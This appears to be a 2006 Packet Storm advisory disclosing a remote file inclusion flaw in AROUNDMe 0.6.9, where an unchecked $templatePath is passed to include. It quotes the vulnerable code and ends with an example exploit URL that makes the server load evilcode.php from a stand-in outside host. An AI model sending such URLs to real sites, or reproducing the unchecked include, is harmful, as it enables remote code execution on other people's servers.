AROUNDMe0.6.9.txt

2006-10-27T00:00:00
ID PACKETSTORM:51375
Type packetstorm
Reporter noislet
Modified 2006-10-27T00:00:00

Description

                                        
                                            `==============================================  
AROUNDMe 0.6.9 remonte file inclusion  
vendor site: http://barnraiser.org/  
vulnerable versions: 0.6.9 (and possibly older)  
  
discovered by: noislet ( http://www.noislet.org/ )  
  
vendor informed: 21.10.2006  
published: 22.10.2006  
==============================================  
  
product info:  
AROUNDMe is the perfect solution for you to bring people together  
around shared goals, activities and interests to form a shared  
knowledge network.  
  
==============================================  
  
bug details:  
Input passed to the "$templatePath" is not verified before being used  
to include files.  
  
required:  
register_globals = On  
  
file:  
pol_view.tpl.php (and others)  
  
buggy code:  
if (isset($poll)) {  
...  
include $templatePath . "poll_detail.inc.tpl.php";  
  
==============================================  
  
example exploitation:  
http://random.site/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=http://example.com/evilcode.php%00  
  
  
--  
noislet  
\ page http://www.noislet.org/  
`